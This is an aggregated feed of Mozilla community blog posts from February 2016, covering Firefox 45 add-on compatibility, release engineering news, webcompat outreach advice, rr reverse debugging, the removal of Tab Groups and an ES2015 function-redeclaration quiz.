Cameron Kaiser: Imagine there's no Intel transition ...

... and with a 12-core POWER8 workstation, it's easy if you try. Reported to me by a user is the Raptor Engineering Talos Secure Workstation, the first POWER workstation I've seen since the last of the PowerPC Intellistations years ago. You can sign up for preorders so they know you're interested. (I did, of course. Seriously. In fact, I'm actually considering buying two, one as a workstation and the second as a new home server.) Since it's an ATX board, you can just stick it in any case you like with whatever power supply and options you want and configure to taste.

Before you start hyperventilating over the $3100 estimated price (which includes the entry-level 8-core CPU), remember that the Quad G5, probably the last major RISC workstation, cost $3300 new and this monster would drive it into the ground. Plus, at "only" 130 watts TDP, it certainly won't run anywhere near as hot as the G5 did either. Likely it will run some sort of Linux, though I can't imagine with its open architecture that the *BSDs wouldn't be on it like a toupee on William Shatner. Let's hope they get enough interest to produce a few, because I'd love to have an excuse to buy one and I don't need much of an excuse.

Mozilla Addons Blog: Hi, I’m Your New AMO Editor

You may have wondered who this “Scott DeVaney” is who posted February’s featured add-ons. Well, it’s me. I just recently joined AMO as your new Editorial & Campaign Manager. But I’m not new to Mozilla; I’ve spent the past couple years managing editorial for Firefox Marketplace.

This is an exciting deal, because my job will be to not only maintain the community-driven editorial processes we have in place today, but to grow the program and build new endeavors designed to introduce even more Firefox users to the wonders of add-ons.

In terms of background, I’ve been editorializing digital content since 1999, when I got my first internet job as a video game editor for a now-dead site. That led to other editorial gigs at DailyRadar, AtomFilms, Shockwave, Comedy Central, and iTunes. (Before all that, I spent a couple years working as a TV production grunt, where my claim to fame is breaking up a cast brawl on the set of Saved by the Bell: The New Class; but that’s a story for a different blog.)

I’m sdevaney on IRC, so don’t be a stranger.

Mozilla Addons Blog: Add-on Compatibility for Firefox 45

Firefox 45 will be released on March 8th. Here’s the list of changes that went into this version that can affect add-on compatibility. There is more information available in Firefox 45 for Developers, so you should also give it a look.





  • Firefox is currently enforcing add-on signing, with a preference to override it. Firefox 46 will remove the preference entirely, which means your add-on will need to be signed in order to run in release versions of Firefox. You can read about your options here.


  • Support for a simplified JSON add-on update protocol. Firefox now supports a JSON update file for add-ons that manage their own automatic updates, as an alternative to the existing XML format. For new add-ons, we suggest using the JSON format. For older add-ons, you shouldn’t switch until most of your users are on 45 or later.
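For illustration, a minimal JSON update manifest can look something like the sketch below. The add-on ID, version, and URL are placeholders, not a real add-on; check the update manifest documentation for the full set of supported keys.

```json
{
  "addons": {
    "": {
      "updates": [
        {
          "version": "1.1",
          "update_link": "",
          "applications": {
            "gecko": {
              "strict_min_version": "45.0"
            }
          }
        }
      ]
    }
  }
}
```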

Let me know in the comments if there’s anything missing or incorrect on these lists. If your add-on breaks on Firefox 45, I’d like to know.

The automatic compatibility validation and upgrade for add-ons on AMO will happen in the coming weeks, so keep an eye on your email if you have an add-on listed on our site with its compatibility set to Firefox 44.

Daniel Pocock: Giving up democracy to get it back

Do services like Facebook and Twitter really help worthwhile participation in democracy, or are they the most sinister and efficient mechanism ever invented to control people while giving the illusion that they empower us?

Over the last few years, groups on the left and right of the political spectrum have spoken more and more loudly about the problems in the European Union. Some advocate breaking up the EU, while behind the scenes milking it for every handout they can get. Others seek to reform it from within.

Yanis Varoufakis on motorbike

Most recently, former Greek finance minister Yanis Varoufakis has announced plans to found a movement (not a political party) that claims to "democratise" the EU by 2025. Ironically, one of his first steps has been to create a web site directing supporters to Facebook and Twitter. A groundbreaking effort to put citizens back in charge? Or further entangling activism in the false hope of platforms that are run for profit by their Silicon Valley overlords? A Greek tragedy indeed, in the classical sense.

Varoufakis rails against authoritarian establishment figures who don't put the citizens' interests first. Ironically, big data and the cloud are a far bigger threat than Brussels. The privacy and independence of each citizen is fundamental to a healthy democracy. Companies like Facebook are obliged - by law and by contract - to service the needs of their shareholders and advertisers paying to study and influence the poor user. If "Facebook privacy" settings were actually credible, who would want to buy their shares any more?

Facebook is more akin to an activism placebo: people sitting in their armchairs clicking to "Like" whales or trees are having hardly any impact at all. Maintaining democracy requires a sufficient number of people to be actively involved, whether it is raising funds for worthwhile causes, scrutinizing the work of our public institutions, or even writing blogs like this. Keeping them busy on Facebook and Twitter renders them impotent in the real world (but please feel free to alert your friends with a tweet).

Big data is one of the areas that requires the greatest scrutiny. Many of the professionals working in the field are actually selling out their own friends and neighbours, their own families and even themselves. The general public and the policy makers who claim to represent us are oblivious or reckless about the consequences of this all-you-can-eat feeding frenzy on humanity.

Pretending to be democratic is all part of the illusion. Facebook's recent announcement to deviate from their real-name policy is about as effective as using sunscreen to treat HIV. By subjecting themselves to the laws of Facebook, activists have simply given Facebook more status and power.

Data means power. Those who are accumulating it from us, collecting billions of tiny details about our behavior, every hour of every day, are fortifying a position of great strength with which they can personalize messages to condition anybody, anywhere, to think the way they want us to. Does that sound like the route to democracy?

I would encourage Mr Varoufakis to get up to speed with Free Software and come down to Zurich next week to hear Richard Stallman explain it the day before launching his DiEM25 project in Berlin.

Will the DiEM25 movement invite participation from experts on big data and digital freedom and make these issues a core element of their promised manifesto? Is there any credible way they can achieve their goal of democracy by 2025 without addressing such issues head-on?

Or put that the other way around: what will be left of democracy in 2025 if big data continues to run rampant? Will it be as distant as the gods of Greek mythology?

Chris Cooper: RelEng & RelOps Weekly Highlights - February 5, 2016

This week, we have two new people starting in Release Engineering: Aki Sasaki (:aki) and Rok Garbas (:garbas). Please stop by #releng and say hi!

Modernize infrastructure:

This week, Jake and Mark added support to runner for our Windows 2008 instances running in Amazon. This is an important step towards parity with our Linux instances in that it allows our Windows instances to check when a newer AMI is available and terminate themselves to be re-created with the new image. Until now, we’ve needed to manually refresh the whole pool to pick up changes, so this is a great step forward.
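The check-and-recycle decision amounts to something like the sketch below. This is a toy under assumed names (the real runner task talks to the EC2 API to list AMIs and to trigger termination); it only shows the comparison logic.

```python
# Sketch: decide whether an instance should terminate itself so it gets
# re-created from a newer image. Function name and tuple layout are
# assumptions, not the actual runner code.
def should_terminate(current_ami, available_amis):
    """available_amis: list of (ami_id, creation_date) tuples."""
    if not available_amis:
        return False
    # Pick the most recently created AMI; ISO dates sort lexicographically.
    newest_ami = max(available_amis, key=lambda ami: ami[1])[0]
    return newest_ami != current_ami

amis = [("ami-11111111", "2016-01-05"), ("ami-22222222", "2016-02-01")]
print(should_terminate("ami-11111111", amis))  # True: a newer image exists
print(should_terminate("ami-22222222", amis))  # False: already on the newest AMI
```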

Also on the Windows virtualization front, Rob and Mark turned on puppetization of Windows 2008 golden AMIs this week. This particular change has taken a long time to make it to production, but it’s hard to overstate the importance of this development. Windows is definitely *not* designed to manage its configuration via puppet, but being able to use that same configuration system across both our POSIX and Windows systems will hopefully decrease the time required to update our reference platforms by substantially reducing the cognitive overhead required for configuration changes. Anyone who remembers our days using OPSI will hopefully agree.

Improve CI pipeline:

Ben landed a Balrog patch that implements JSONSchemas for Balrog Release objects. This will help ensure that data entering the system is more consistent and accurate, and allows humans and other systems that talk to Balrog to be more confident about the data they’ve constructed before they submit it.
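To illustrate the idea, here is a toy validator in the same spirit. Balrog uses real JSON Schema definitions with many more fields (e.g. via the Python `jsonschema` library); the field names below are simplified assumptions, not Balrog's actual schema.

```python
# Minimal sketch of schema validation: reject malformed release blobs
# before they enter the system.
RELEASE_SCHEMA = {
    "name": str,
    "schema_version": int,
}

def validate_release(blob):
    """Return a list of problems; an empty list means the blob looks sane."""
    problems = []
    for field, expected in RELEASE_SCHEMA.items():
        if field not in blob:
            problems.append("missing required field: " + field)
        elif not isinstance(blob[field], expected):
            problems.append(field + " should be " + expected.__name__)
    return problems

print(validate_release({"name": "Firefox-45.0-build1", "schema_version": 4}))  # []
print(validate_release({"name": "Firefox-45.0-build1"}))  # flags the missing field
```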

Ben also enabled caching for the Balrog admin application. This dramatically reduces the database and network load it uses, which makes it faster, more efficient, and less prone to update races.


We’re currently on beta 3 for Firefox 45. After all the earlier work to unhork gtk3 (see last week’s update), it’s good to see the process humming along.

A small number of stability issues have precipitated a dot release for Firefox 44. A Firefox 44.0.1 release is currently in progress.


Kim implemented changes to consume SETA information for Android API 15+, using data from API 11+ until we have sufficient data for API 15+ test jobs. This reduced the high pending counts for the AWS instance types used by Android.

Coop (hey, that’s me!) did a long-overdue pass of platform support triage. Lots of bugs got closed out (30+), a handful actually got fixed, and a collection of Windows test failures got linked together under a root cause (thanks, philor!). Now all we need to do is find time to tackle the root cause!

See you next week!

Air Mozilla: Foundation Demos February 5 2016

Mozilla Foundation Demos, February 5, 2016.

Mozilla WebDev Community: Extravaganza – February 2016

Once a month, web developers from across Mozilla get together to talk about the work that we’ve shipped, share the libraries we’re working on, meet new folks, and talk about whatever else is on our minds. It’s the Webdev Extravaganza! The meeting is open to the public; you should stop by!

You can check out the wiki page that we use to organize the meeting, or view a recording of the meeting in Air Mozilla. Or just read on for a summary!

Shipping Celebration

The shipping celebration is for anything we finished and deployed in the past month, whether it be a brand new site, an upgrade to an existing one, or even a release of a library.

Git Submodules are Gone from MDN

First up was jezdez with news about MDN moving away from using git submodules to pull in dependencies. Instead, MDN now uses pip to pull in dependencies during deployment. Hooray!

Careers now on AWS/Deis

Next was giorgos, who let us know that the careers site has moved over to the Engagement Engineering Deis cluster on AWS. For deployment, the site has Travis CI build a Docker image and run tests against it. If the tests pass, the image is deployed directly to Deis. Neat!
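The flow described above could be sketched in a .travis.yml along these lines. Image names and script paths are illustrative assumptions, not the site's actual configuration.

```yaml
sudo: required
services:
  - docker

script:
  # Build the image once, then run the test suite inside it
  - docker build -t careers:$TRAVIS_COMMIT .
  - docker run careers:$TRAVIS_COMMIT ./

deploy:
  provider: script
  # Only images whose tests passed reach this step
  script: ./bin/ careers:$TRAVIS_COMMIT
  on:
    branch: master
```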

Privacy Day

jpetto helped ship the Privacy Day page. It includes a mailing list signup form as well as instructions for several platforms on how to update your software to stay secure.

Automated Functional Testing for

agibson shared news about the migration of previously-external functional tests to live within the Bedrock repository itself. This allows us to run the tests, which previously were run by the WebQA team against live environments, whenever the site is deployed to dev, stage, or production. Having the functional tests be a part of the build pipeline ensures that developers are aware when the tests are broken and can fix them before deploying broken features. A slide deck is available with more details.

Peep 3.x

ErikRose shared news about the 3.0 (and 3.1) release of Peep, which helps smooth the transition from Peep to Pip 8, which now supports hashed requirements natively. The new Peep includes a peep port command for porting Peep-compatible requirements files to the new Pip 8 format.
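For reference, the pip 8 hash-pinning style that `peep port` converts to looks roughly like this; the package pin is an example and the digest is a placeholder, not a real hash.

```text
# requirements.txt, pip 8 style: pip verifies each download against its hash
requests==2.9.1 \
    --hash=sha256:<hex digest of the release archive>
```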

Open-source Citizenship

Here we talk about libraries we’re maintaining and what, if anything, we need help with for them.

JazzBand
jezdez shared news about JazzBand, a cooperative experiment to reduce the stress of maintaining Open Source software alone. The group operates as a GitHub organization that anyone can join and transfer projects to. Anyone in the JazzBand can access JazzBand projects, allowing projects that would otherwise die due to lack of activity to thrive thanks to the community of co-maintainers.

Notable projects already under the JazzBand include django-pipeline and django-configurations. The group is currently focused on Python projects and is still figuring out things like how to secure releases on PyPI.

django-configurations 1.0

Speaking of the JazzBand, members of the collective pushed out the 1.0 release of django-configurations, which is an opinionated library for writing class-based settings files for Django. The new release adds Django 1.8+ support as well as several new features.

Roundtable
The Roundtable is the home for discussions that don’t fit anywhere else.

Travis CI Sudo for Specific Environments

Next was ErikRose with an undocumented tip for Travis CI builds. As seen on the LetsEncrypt travis.yml, you can specify sudo: required for a specific entry in the build matrix so that only that build runs on Travis’ sudo-enabled VM infrastructure, while the rest of the matrix stays on the container-based infrastructure.
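A hedged sketch of what that looks like in a travis.yml; the env values are placeholders, so see the LetsEncrypt configuration for a real example.

```yaml
language: python
sudo: false            # default: jobs run on the container-based infrastructure
matrix:
  include:
    - python: "2.7"
      env: TOXENV=py27
    - python: "2.7"
      env: TOXENV=integration
      sudo: required   # only this job opts into the sudo-enabled VM infrastructure
```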

Docker on OS X via xhyve

Erik also shared xhyve, which is a lightweight OS X hypervisor. It’s a port of bhyve, and can be used as the backend for running Docker containers on OS X instead of VirtualBox. Recent changes that have made this more feasible include the removal of a 3 gigabyte RAM limit and experimental NFS support that, according to Erik, is faster than VirtualBox’s shared folder functionality. Check it out!

If you’re interested in web development at Mozilla, or want to attend next month’s Extravaganza, subscribe to the mailing list to be notified of the next meeting, and maybe send a message introducing yourself. We’d love to meet you!

See you next month!

Mozilla Security Blog: Mozilla Winter of Security-2015 MozDef: Virtual Reality Interface

Mozilla runs Winter of Security (MWoS) every year to give folks an opportunity to contribute to ongoing security projects in flight. This year an ambitious group took on the task of creating a new visual interface in our SIEM overlay for Elasticsearch that we call MozDef: The Mozilla Defense Platform.

Security personnel are in high demand and analyst skill sets are difficult to maintain. Rather than only focusing on making people better at security, I’m a firm believer that we need to make security better at people. Interfaces that are easier to comprehend and use seem to be a worthwhile investment in that effort and I’m thrilled with the work this team has done.

They’ve wrapped up their project with a great demo of their work. If you are interested in security automation tools and alternative user interfaces, take a couple minutes and check out their work over at air mozilla.


Air Mozilla: Mozilla Winter of Security-2015 MozDef: Virtual Reality Interface

MWoS students give an awesome demo of their work adding a unique interface to MozDef: The Mozilla Defense Platform.

Chris Cooper: Welcome (back), Aki!

Aki in Slave Unit. This actually is Aki.

In addition to Rok, who also joined our team this week, I’m ecstatic to welcome back Aki Sasaki to Mozilla release engineering.

If you’ve been a Mozillian for a while, Aki’s name should be familiar. In his former tenure in releng, he helped bootstrap the build & release process for both Fennec *and* FirefoxOS, and was also the creator of mozharness, the python-based script harness that has allowed us to push so much of our configuration back into the development tree. Essentially he was devops before it was cool.

Aki’s first task in this return engagement will be to figure out a generic way to interact with Balrog, the Mozilla update server, from TaskCluster. You can follow along in bug 1244181.

Welcome back, Aki!

Chris Cooper: Welcome, Rok!

The Rock. This is *not* our Rok.

I’m happy to announce a new addition to Mozilla release engineering. This week, we are lucky to welcome Rok Garbas to the team.

Rok is a huge proponent of Nix and NixOS. Whether we end up using those particular tools or not, we plan to leverage his experience with reproducible development/production environments to improve our service deployment story in releng. To that end, he’s already working with Dustin who has also been thinking about this for a while.

Rok’s first task is to figure out how the buildbot-era version of clobberer, a tool for clearing and resetting caches on build workers, can be rearchitected to work with TaskCluster. You can follow along in bug 1174263 if you’re interested.

Welcome, Rok!

Carsten Book: Sheriff Newsletter for January 2016

To give a little insight into our work and make it more visible to our community, we decided to create a monthly report of what’s going on in the Sheriffs Team.
If you have questions or feedback, just let us know!
In case you don’t know who the sheriffs are, or to check if there are current issues on the tree, see:
Topics of this month!
1. How-To article of the month
2. Get involved
3. Statistics for January
4. Orange Factor
5. Contact
1. How-To article of the month and notable things!
-> In the Sheriff Newsletter we mentioned the “Orange Factor” – but what is this? It is simply the ratio of oranges (test failures) to test runs. The ideal value is, of course, zero.

Practically, this is virtually impossible for a code base of any substantial size, so it is a matter of policy as to what is an acceptable orange factor.

It is worth noting that the overall orange factor indicates nothing about the severity of the oranges. [4]
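As a quick illustration of the arithmetic described above (the counts below are made up, not January's real numbers):

```python
def orange_factor(oranges, test_runs):
    """Orange Factor: the ratio of oranges (test failures) to test runs."""
    if test_runs == 0:
        raise ValueError("need at least one test run")
    return oranges / test_runs

# e.g. 1292 failures observed across 100 runs gives an Orange Factor of 12.92
print(orange_factor(1292, 100))
```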

The main site where you can check out the “Orange Factor” is at and some interesting info is here
-> As you might be aware, Firefox OS has moved into Tier 3 Support [5] – this means that there is no Sheriff Support anymore for the b2g-inbound tree.

With the move to tier 3, b2g tests are now hidden by default on Treeherder. To view test results, for example on Treeherder for mozilla-central, you need to click the “show/hide excluded jobs” checkbox in the tree view.

2. Get involved!
Are you interested in helping out by becoming a Community Sheriff? Let us know!
3. Statistics
Intermittent Bugs filed in January  [1]: 667
and of those are closed: 107 [2]
For Tree Closing times and reasons see:
4. Orange Factor
Current Orangefactor [3]: 12.92
5. How to contact us
There are a lot of ways to contact us. The fastest one is to contact
the sheriff on duty (the one with the |sheriffduty tag on their nick
:) or to email sheriffs @ mozilla dot org.

Karl Dubost: [worklog] Outreach is hard, Webkit aliasing big progress

Tunes of the week: Earth, Wind and Fire. Maurice White, the founder, died at 74.

WebCompat Bugs

WebKit aliasing

  • When looking for usage of -webkit-mask-*, I remembered that Google Image was a big offender. So I tested again this morning and… delight! They now use SVG. So now, I need to test Google search extensively and check if they can just send us the version they send to Chrome.
  • Testing Google Calendar again on Gecko with a Chrome user agent to see how far we are from receiving a better user experience. We can't really yet ask Google to send us the same thing they send to Chrome. A couple of glitches here and there. But we are very close. The best outcome would be for Google to fix their CSS, specifically to make the flexbox and gradients standards-compatible.
  • The code for the max-width issue (not a bug, but implementation differences due to an undefined scenario in the CSS specification) is being worked on by David Baron and reviewed by Daniel Holbert. This makes me happy; it should solve a lot of the Webcompat bug reports. Look at the list of SeeAlso in that bug.

Webcompat Life and Working with Developer Tools

  • Changing preferences all the time through "about:config" takes multiple steps. I liked how in Opera Presto you could link to a specific preference, so I filed a bug for Firefox. RESOLVED. It exists: about:config?filter=webkit, and it's bookmark-able.
  • Bug 1245365 - searching attribute values through CSS selectors override the search terms
  • A discussion has been started on improving the Responsive Design Mode of Firefox Developer Tools. I suggested a (too big) list of features that would make my life easier.

Firefox OS Bugs to Firefox Android Bugs

  • Mozilla's Web Compatibility employees reduced their support for solving Firefox OS bugs to a minimum. The community is welcome to continue working on them. But some of these bugs still have an impact on Firefox Android. One good example of this is Bug 959137. Let's come up with a process to deal with those.
  • Another todo from last week. I have been closing a lot of old bugs (around 600 in a couple of days) in Firefox OS and Firefox Android in the Tech Evangelism product. The reasons for closing them are mostly:
    • the site doesn't exist anymore. (This goes into my list of Web Compatibility axioms: "Wait long enough, every bug disappears.")
    • the site fixed the initial issue
    • setting layout.css.prefixes.webkit to true fixes it (see Bug 1213126)
    • the site has moved to a responsive design

Bug 812899 - absolutely positioned element should be vertically centered even if the height is bigger than that of the containing block

This bug was simple at the beginning, but when providing the fix, it broke other tests. That's normal. Boris explained which parts of the code were impacted. But I don't feel I'm good enough yet to touch this. Or it would require patience and step-by-step guidance. It could be interesting, though. I have the feeling I have too much on my plate right now. So, a bug to take over!

Testing Google Search On Gecko With Different UA Strings

So last week, I gave myself a todo: "testing Google search properties and see if we can find a version which is working better on Firefox Android than the current default version sent by Google. Maybe testing with Chrome UA and iPhone UA." My preliminary tests sound pretty good.

Reading List

Follow Your Nose


Karl Dubost: Steps Before Considering a Bug "Ready for Outreach"

Sometimes another team at Mozilla will ask the Webcompat team for help contacting site owners to fix an issue on their Web site which hinders the user experience in Firefox. Let's go through some tips to maximize the chances of getting results when we do outreach.

Bug detection


A bug has been reported by a user or a colleague. They probably had the issue at the moment they tested. The source of the issue is still quite unknown. Network glitch, specific addon configuration, particular version of Firefox, broken build of Nightly. Assess if the bug is reproducible in the most neutral possible environment. And if it's not already done, write in the comments "Steps to reproduce" and describe all the steps required to reproduce the bug.

Analyzing the issue


You have been able to reproduce. It is time to understand it. Explain it in very clear terms. Think about the person on the other end who will need to fix the bug. This person might not be a native English speaker. This person might not be as knowledgeable as you about Web technologies. Provide links and samples to the code with the issue at stake. This will help the person find the appropriate place in the code.

Providing a fix for the issue


When explaining the issue, you might have also found out how to fix it, or at least one way to fix it. It might not be the way the contacted person will fix it. We do not know their tools, but it will help them create an equivalent fix that fits their process. If your proposal is a better practice, explain why it is beneficial for performance, longevity, resilience, etc.

Partly a Firefox bug


The site is not working, but it's not entirely their fault. Firefox changed behavior. The browser became more compliant. The feature had a bug which is in the process of being fixed. Think twice before asking for outreach. Sometimes it's just better to push a bit more on fixing the bug in Firefox. It has more chances to be useful for all the unknown sites using the feature. If the site is a big popular site, you might want to ask for outreach, but you need a very good incentive such as improving performance.

Provide a contact hint


If by chance, you already have contacts in this company, share the data, even try directly to contact that person. If you have information that even bookies don't know about the company, be sure to pass it on for maximizing the chances of outreach. The hardest part is often to find the right person who can help you fix the issue.

Outreach might fail

And here's the dirty secret: the outreach might not work, or might not be effective right away. Be patient. Be persistent.


Fixing a Web site costs a lot more than you can imagine. Time and frustration are part of the equation. Outreach is not a magical bullet. Sometimes it takes months to years to fix an issue. Some reasons why the outreach might fail:

  • Impossible to find the right contacts. Sometimes you can send bug reports through the official channels of communication of the company and have your bug ignored or misunderstood. For one site, I had reported for months through the bug reporting system until I finally decided to try a back door: emailing a developer whose contact information I happened to find online. The bug was fixed in a couple of days.
  • Developers have bosses. They first need to comply with what their bosses told them to do. They might not be in a very good position in the company, have conflicts with the management, etc. Or they just don't have the freedom to take the decision that will fix the issue, even a super simple one.
  • Another type of boss is the client. The client was sold a Web site with a certain budget. Maintenance is always a contentious issue. Web agencies are not working for free, even if the bug was there in the first place. The client might not have asked them to test in that specific browser. Escalating a bug to the client means the Web agency has to bill the client, and the client might not want to pay.
  • Sometimes, you will think that you got an easy win. The bug has been solved right away. What you do not know is that the developer in charge has just put a hack in his code with a beautiful TOFIX that will be crushed at the next change of tools or update.
  • You just need to upgrade to version X of your JS library: updating the library will break everything else or will require testing the zillion other features that use this lib in the rest of the site. In a cost/benefit scenario, you have to demonstrate to the dev that the fix is worth their time and the testing.
  • Wrong department. Sometimes you get the press service, sometimes the communications department, sometimes the IT department in charge of the office backend or commercial operations systems, but not the Web site.
  • The twitter person is not techy. This happens very often. With the blossoming of social media managers (do we still say that?), the people on the front line are usually helpless when it's really technical. Your only chance is to convince them to communicate with the tech team. But the tech team often despises them, because too often they bring reports that are just useless. If the site is an airline company, a bank, or a very consumer-oriented service, just forget trying to contact them through twitter.
  • The twitter person is a bot. Check the replies on this twitter account, if there is no meaningful interaction with the public, just find another way.
  • You contacted. Nothing happened. People on the other side forget. I'm pretty sure you are also late replying to this email or patching this annoying bug. People ;)
  • The site is just not maintained anymore. No budget. No team. No nobody for moving forward the issue.
  • You might have pissed off someone when contacting. You will never know why. Maybe it was not the right day, maybe it was something in your signature, maybe it was the way you addressed them. Be polite, have empathy.

In the end my message is look for the bare necessities of life.

Bug images from American entomology: or description of the insects of North America, illustrated by coloured figures from original drawings executed from nature. Thanks to the New-York Public Library.


Mike Hommey: Going beyond NS_ProcessNextEvent

If you’ve been debugging Gecko, you’ve probably hit the frustration of having the code you’re inspecting being called asynchronously, and your stack trace rooting through NS_ProcessNextEvent, which means you don’t know at first glance how your code ended up being called in the first place.

Events running from the Gecko event loop are all nsRunnable instances. So at some level close to NS_ProcessNextEvent, in your backtrace, you will see Class::Run. If you’re lucky, you can find where the nsRunnable was created. But that requires the stars to be perfectly aligned. In many cases, they’re not.

There comes your savior: rr. If you don’t know it, check it out. The downside is that you must first rr record a Firefox session doing what you’re debugging. Then, rr replay will give you a debugger with the capabilities of a time machine.

Note, I’m kind of jinxed, I don’t do much C++ debugging these days, so every time I use rr replay, I end up hitting a new error. Tip #1: try again with rr’s current master. Tip #2: roc is very helpful. But my takeaway is that it’s well worth the trouble. It is a game changer for debugging.

Anyways, once you’re in rr replay and have hit your crasher or whatever execution path you’re interested in, and you want to go beyond that NS_ProcessNextEvent, here is what you can do:

(rr) break nsEventQueue.cpp:60
(rr) reverse-continue

(Adjust the line number to match wherever the *aResult = mHead->mEvents[mOffsetHead++]; line is in your tree).

(rr) disable
(rr) watch -l mHead->mEvents[mOffsetHead]
(rr) reverse-continue
(rr) disable

And there you are, you just found where the exact event that triggered the executed code you were looking at was put on the event queue. (assuming there isn’t a nested event loop processed during the first reverse-continue)

Rinse and repeat.

Robert O'Callahan: rr Talk At

For the last few days I've been attending, and yesterday I gave a talk about rr. The talk is now online. It was a lot of fun and I got some good questions!

Mozilla Addons Blog: February 2016 Featured Add-ons

Pick of the Month: Proxy Switcher

by rNeomy
Access all of Firefox’s proxy settings right from the toolbar panel.

“Exactly what I need to switch on the fly from Uni/Work to home.”

Featured: cyscon Security Shield

by patugo GmbH
Cybercrime protection against botnets, malvertising, data breaches, phishing, and malware.

“The plugin hasn’t slowed down my system in any way. Was especially impressed with the Breach notification feature—pretty sure that doesn’t exist anywhere else.”

Featured: Decentraleyes

by Thomas Rientjes
Evade ad tracking without breaking the websites you visit. Decentraleyes works great with other content blockers.

“I’m using it in combination with uBlock Origin as a perfect complement.”

Featured: VimFx

by akhodakivkiy, lydell
Reduce mouse usage with these Vim-style keyboard shortcuts for browsing and navigation.

“It’s simple and the keybindings are working very well. Nice work!!”

Featured: Saved Password Editor

by Daniel Dawson
Adds the ability to create and edit entries in the password manager.

“Makes it very easy to log in to any site, saves the time of manually typing everything in.”

Nominate your favorite add-ons

Featured add-ons are selected by a community board made up of add-on developers, users, and fans. Board members change every six months, so there’s always an opportunity to participate. Stay tuned to this blog for the next call for applications.

If you’d like to nominate an add-on for featuring, please send it to for the board’s consideration. We welcome you to submit your own add-on!

Support.Mozilla.OrgWhat’s up with SUMO – 4th February

Hello, SUMO Nation!

Last week went by like lightning, mainly due to FOSDEM 2016, but also due to the year speeding up – we’re already in February! What are the traditional festivals in your region this month? Let us know in the comments!

Welcome, new contributors!

If you just joined us, don’t hesitate – come over and say “hi” in the forums!

Contributors of the week

  • Philipp – for his continuous help with Firefox Desktop and many other aspects of Mozilla and SUMO – Vielen Dank!

We salute you!

Don’t forget that if you are new to SUMO and someone helped you get started in a nice way you can nominate them for the Buddy of the Month!

Most recent SUMO Community meeting

The next SUMO Community meeting…

  • is happening on Monday the 8th of February – join us!
  • Reminder: if you want to add a discussion topic to the upcoming meeting agenda:
    • Start a thread in the Community Forums, so that everyone in the community can see what will be discussed and voice their opinion here before Monday (this will make it easier to have an efficient meeting).
    • Please do so as soon as you can before the meeting, so that people have time to read, think, and reply (and also add it to the agenda).
    • If you can, please attend the meeting in person (or via IRC), so we can follow up on your discussion topic during the meeting with your feedback.




Support Forum

Knowledge Base


  • Please check the Firefox for iOS section below for an important announcement!


And that’s it – short and sweet for your reading pleasure. We hope you have a great weekend and we are looking forward to seeing you on Monday! Take it easy and keep rocking the helpful web. Over & out!

Air MozillaWeb QA Weekly Meeting, 04 Feb 2016

Web QA Weekly Meeting This is our weekly gathering of Mozilla’s Web QA team, filled with discussion on our current and future projects, ideas, demos, and fun facts.

Air MozillaReps weekly, 04 Feb 2016

Reps weekly This is a weekly call with some of the Reps to discuss all matters about/affecting Reps and invite Reps to share their work with everyone.

Gervase MarkhamMOSS Applications Still Open

I am currently running the MOSS (Mozilla Open Source Support) program, which is Mozilla’s program for assisting other projects in the open source ecosystem. We announced the first 7 awardees in December, giving away a total of US$533,000.

The application assessment process has been on hiatus while we focussed on getting the original 7 awardees paid, and while the committee were on holiday for Christmas and New Year. However, it has now restarted. So if you know of a software project that could do with some money and that Mozilla uses or relies on (note: that list is not exhaustive), now is the time to encourage them to apply. :-)

Gijs KruitboschWhy was Tab Groups (Panorama) removed?

Firefox 44 has been released, and it has started warning users of Tab Groups about its removal in Firefox 45. There were a number of reasons that led to the removal of Tab Groups. This post will aim to talk about each in a little bit more detail.

The removal happened in the context of “Great or Dead”, where we examine parts of Firefox, look at their cost/benefit balance, and sometimes decide to put resources into improving them, and sometimes decide to recognize that they don’t warrant that and remove that part of the browser.

For Tab Groups, here are some of the things we considered:

  • It had a lot of bugs: a number of serious performance issues, a lot of intermittently failing tests, buggy group and window closing, and a huge pile of smaller issues. You couldn’t move tabs represented as large squares into groups represented as small squares; sometimes you could get stuck in it, or groups would randomly move; and the list goes on. The quality simply wasn’t what it should be, considering we ship it to millions of users, which was part of the reason why it was hidden away as much as it was.
  • The Firefox team does not believe that the current UI is the best way to manage large numbers of tabs. Some of the user experience and design folks on our team have ideas in this area, and we may revisit “managing large numbers of tabs” at some point in the future. We do know that we wouldn’t choose to re-implement the same UI again. It wouldn’t make sense to heavily invest in a feature that we should be replacing with something else.
  • It was interfering with other important projects, like electrolysis (multi-process Firefox). When using separate processes for separate tabs, we need to make certain behaviours that used to be synchronous deal with being asynchronous. The way that Tab Groups’ UI was interwoven with the tabbed browser code, and the way the UI effectively hid all the tabs and showed thumbnails for all of them instead, made this harder for things like tab switching and tab closing.
  • It had a number of serious code architecture problems. Some of the animation and library choices caused intermittent issues for users as linked to earlier. All of the groups were stored with absolute pixel positions, creating issues if you change your window size, use a different screen or resolution, etc. When we added a warning banner to the bottom of the UI telling users we were going to remove it, that interfered with displaying search results. The code is very fragile.
  • It was a large feature. By removing tab groups we removed more than 24,000 lines of code from Firefox.

With all these issues in mind, we had to decide if it was better to invest in making it a great feature in Firefox, or remove the code and focus on other improvements to Firefox. When we investigated usage data, we found that only an extremely small fraction of Firefox users were making use of Tab Groups: around 0.01%. Such low usage couldn’t justify the massive amount of work it would take to improve Tab Groups to an acceptable quality level, and so we chose to remove it.

If you use Tab Groups, don’t worry: we will preserve your data for you, and there are add-ons available that can make the transition completely painless.

Mike TaylorA quiz about ES2015 block-scoped function declarations (in a with block statement)

Quiz time, nerds.

Given the following bit of JS, what's the value of window.f when lol gets called outside of the with statement?

with (NaN) {
  window.f = 1;
  function lol(){window.f = 2};
  function lol(){window.f = 3};
}

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Trick question, your program crashed before it got to call lol()!

According to ES2015, it should be a SyntaxError, because you're redefining a function declaration in the same scope. Just like if you were re-declaring a let thingy more than once.

However, the real trick is that Chrome and Firefox will just ignore the first declaration so your program doesn't explode (for now, anyways). So the answer is really just 3 (which you probably guessed).


Not surprisingly there are sites out there that depend on this funky declared-my-function-twice-in-the-same-scope pattern. was one (bug here), but they were super cool and fixed their code already. The Akamai Media Player on (bug here) is another (classic move).

It would be really cool if browsers didn't have to do this, so if you know anybody who works on the Akamai Advanced Media Player, tell them to delete the second declaration of RecommendationsPlugin()? And if you see an error in Firefox that says redeclaration of block-scoped function 'coolDudeFunction' is deprecated, go fix that too — it might stop working one day.

Now don't forget to like and subscribe to my Youtube ES2016 Web Compat Pranks channel.

(The with(NaN){} bit isn't important, but it was lunch time when I wrote this.)

